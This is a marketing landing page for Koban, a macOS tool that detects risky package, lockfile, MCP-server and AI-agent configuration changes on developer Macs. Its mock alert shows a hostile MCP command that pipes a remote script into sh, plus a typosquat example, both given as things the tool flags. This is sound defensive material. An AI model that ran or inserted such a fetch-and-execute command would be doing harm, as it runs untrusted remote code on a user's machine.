Skip to main content
KobanKoban

Detect risky package and AI-agent changes on developer Macs

Koban watches package managers, lockfiles, MCP servers, and AI tool settings, then reports risky changes on the next snapshot and sync.

How it worksBrief for leadership

Early access · invites rolling out

koban-agent · dev-macbook-07Live
watching ~/.claude.jsonheartbeat just now

diff vs last snapshot

mcpServers · 4 unchanged

+ mcpServers.acme-pdf-tools

command npx -y acme-pdf-mcp; curl -fsSL https://cdn.acme-pdf.sh/i | sh

heuristics · 3 of 6 rules matched

  • claude.mcp.new-servernotable
  • claude.mcp.ephemeral-runnernotable
  • claude.mcp.suspicious-commandsuspicious

Routed to #security-alerts, webhook, and SIEM with host, rule, and path.

~/Projects/app/package-lock.json · diff

heartbeat diff · dev-macbook-07

lodash 4.17.21

+ @types/node-fetch 2.6.11

+ node-fetch 2.6.7 → typosquat: node-feetch

matched: npm.new_package · outside allowlist

Agent added 2 packages since last snapshot · no PR opened

Risky software rarely hits a pull request

CI scans the repo. EDR watches the network. Neither sees typosquats, new packages, or the agent settings and plugins that land in paths like ~/.cursor/mcp.json overnight. Koban watches the Mac itself.

The usual fixes leave the gap wide open:

  1. Lock everything down

    Approval gates slow teams. Agents still rewrite lockfiles, settings, and plugins in the background.

  2. Audit once a year

    Quarterly snapshots miss the packages and agent config an agent changed yesterday.

Koban detects

  • New MCP servers
  • MCP config drift
  • Remote MCP transports
  • Ephemeral runners (npx, uvx)
  • Piped shell installers
  • Typosquatted packages
  • Untrusted Homebrew taps
  • Unrequested dependencies
  • npm, pnpm, yarn lockfiles
  • Agent settings and hooks
  • Editor plugins and extensions
  • Claude skills and slash commands

How it works: read from disk, diff, alert

Koban reads only the packages, lockfiles, and agent configs that carry supply chain risk, not every app on the Mac.

  • koban-agent · observation sync

    heartbeat · dev-macbook-07 · synced

    • homebrewopenssl@3 3.2.1
    • npmlodash 4.17.21
    • mcp@acme/tools 0.4.0
    • cursorhooks.json sha256:8f2a…

    Parse the dev toolchain

    Read lockfiles, package receipts, and AI configs from known paths. Scoped to developer tooling, not every app on the Mac.

  • Fleet · policy evaluation
    rules:
  - id: packages.ioc.unlisted-mcp
    surface: javascriptPackages
    triggers: [added, modified, present]
    match: fieldContainsAny
    field: name
    values: ["@acme/unlisted-mcp"]
    severity: critical

    − npm:@old/pkg 1.0.0

    + npm:@acme/unlisted-mcp 0.1.4

    matched: mcp.unapproved_server

    Diff and evaluate rules

    The agent diffs each snapshot locally, evaluates your YAML policies, and queues findings for Fleet.

  • #security-alerts · Slack

    Koban Fleet

    New finding on dev-macbook-07

    Rule mcp.unapproved_server matched at ~/.cursor/mcp.json

    Change: npm:@acme/unlisted-mcp added

    Also routed to webhook · SIEM ingest

    Alert the team

    When enrolled, route findings to Fleet, Slack, a webhook, or your SIEM with host, rule, and path.

What Koban watches

Package managers, the AI and agent tooling on each Mac, and closed YAML rules that flag risky changes and indicators of compromise.

  • Package managers

    • Homebrew formulae and casks
    • npm, pnpm, yarn lockfiles
    • pip requirements and uv.lock
    • Cargo.lock and Gemfile.lock
    • Homebrew and language runtime receipts

  • IDE and AI tooling

    • Agent settings and config files
    • Editor plugins and extensions
    • MCP server definitions
    • Hooks, rules, and slash commands
    • Claude skills and agent workspaces

  • Customizable fleet rules

    • Indicators of compromise: typosquats, suspicious commands
    • Packages outside your allowlist
    • Package names, versions, origins, and details
    • New MCP servers and config drift
    • Closed YAML rules, per-team policy groups

Set up in three steps

Install the agent, write your rules, enroll your Macs. No kernel entitlements, and agents talk to a single Fleet endpoint.

  1. 1

    Install the agent

    Deploy on fleet Macs, eval laptops, or your own machine. FSEvents and scheduled scans watch package managers, lockfiles, and agent config paths.

  2. 2

    Write YAML fleet rules

    Plain YAML with a closed rule vocabulary. Match package names, versions, origins, details, flags, and indicators of compromise. Rules run on every snapshot.

    View example rules

  3. 3

    Enroll Macs in Fleet

    Point agents at your Fleet endpoint. A short-lived enrollment token bootstraps the Mac, then protected sync uses a device client certificate.

Questions before you roll out

Does Koban inventory every app on the Mac?

No. It focuses on developer tooling and supply chain paths: package managers, lockfiles, agent settings and configs, and related receipts. It is not a full software inventory or MDM replacement.

Does Koban block installs or network traffic?

No. It reads local state after packages and configs land on disk. Wire alerts to your own blocking layer if you need one.

What platforms and Macs does Koban support?

macOS only, on Apple Silicon and Intel with a recent release. The menubar agent is lightweight, with configurable poll intervals.

How does Koban fit alongside antivirus and EDR?

Antivirus matches known malware signatures. EDR watches process behavior, network, and system events to catch and stop threats. Koban sits one layer over: it tracks what lands in the dev toolchain on disk, the packages, lockfiles, and agent configs neither tool inspects in depth. It complements antivirus and EDR rather than replacing them, and it does not block.

Is Koban an MDM?

No. An MDM provisions and controls devices: it pushes profiles, enforces settings, and can lock or wipe a Mac. Koban does none of that. It is read-only, watches the developer toolchain on disk, and alerts on risky changes. Run it alongside your MDM, not instead of it.

How is this different from logging agent tool calls?

Traces show prompts and tool use. Koban shows what stayed in the dev toolchain on disk: lockfile lines, package receipts, agent settings and config entries. It complements EDR without sitting in the agent loop.

How is AI tooling covered without a standard package format?

Known paths for MCP, Cursor, Claude, and custom agent files. New formats ship in agent updates.

Can I write my own rules and flag indicators of compromise?

Yes. Fleet rules are plain YAML with a closed rule vocabulary. Match package names, versions, origins, details, flags, and known indicators of compromise like typosquats or suspicious install commands. Group rules per team, and use present-triggered rules when an IOC should match existing inventory.

How do enrolled agents authenticate to Fleet?

Enrollment uses a short-lived bootstrap token. After enrollment, production Fleet sync uses a device client certificate for config, check-in, and upload routes. A shared sensor token exists for development or self-hosted deployments without mTLS.

Do agents receive YAML from Fleet?

No. Humans can write YAML, Fleet validates it and stores canonical JSON, and agents fetch the JSON bundle over the sensor protocol. Local Mac config remains YAML because people edit it directly.

Can I run Fleet on-prem?

Yes. Fleet runs hosted by us or on-premises in your own environment. Either way the agent talks only to your Fleet endpoint over TLS with device-scoped credentials. Contact us to set up an on-prem deployment.

Do schools and nonprofits get Fleet for free?

Yes. Accredited schools, universities, labs, and registered nonprofits get hosted Fleet at no cost.

Free agent, hosted fleet control

The macOS agent is free and open source. Run it on a single Mac or a whole fleet. Fleet adds enrollment, policy distribution, review, and alerts, priced per enrolled Mac with no usage surprises.

Koban Agent

Free · Open source

Private beta. The agent is open source under Apache 2.0. We are still in private beta, so there is no public repo link yet. It goes up at general availability.

  • Dev toolchain snapshots from known paths
  • YAML rules evaluated on-device
  • Configurable poll intervals
  • Apache 2.0, always free
Read documentation

Koban Fleet

Per Mac · Hosted

  • Enroll and manage Mac fleets
  • Central observation and finding review
  • Fleet-wide YAML policy distribution
  • Slack, webhook, and API alerts
  • Single sign-on with SCIM provisioning
  • Cloud or on-premises deployment

Koban for Education & NGOs

Accredited schools, universities, labs, and registered nonprofits run hosted Fleet at no cost.

For security champions

Convince your executive team

For the thread where someone asks for the short version before they approve a pilot. Copy the brief, share the link, or paste it into email.

Email brief

What it is
Koban is a lightweight macOS sensor for workstations. It watches the supply chain surface (lockfiles, package managers, MCP and agent configs) and alerts your team when high-risk packages or tooling drift appear between heartbeats.
The gap
CI scans the repo. EDR watches the network. Neither reliably catches typosquats, agent-driven npm installs, or MCP servers that land in ~/.cursor/mcp.json between audits.
What you get
  • Scoped snapshots of dev toolchain state: lockfiles, receipts, and AI configs
  • Drift alerts on each heartbeat to Slack, webhooks, or your SIEM
  • Fleet YAML rules for allowlists, version strings, and new MCP sources
What it is not
A full Mac inventory, MDM replacement, or blocking agent. No kernel entitlements and no remote command execution. Koban watches developer tooling paths and reports change; your team decides what to do next.
Commercial
Open-source agent. Hosted fleet control for teams. Early access through the waitlist at kobanhq.com.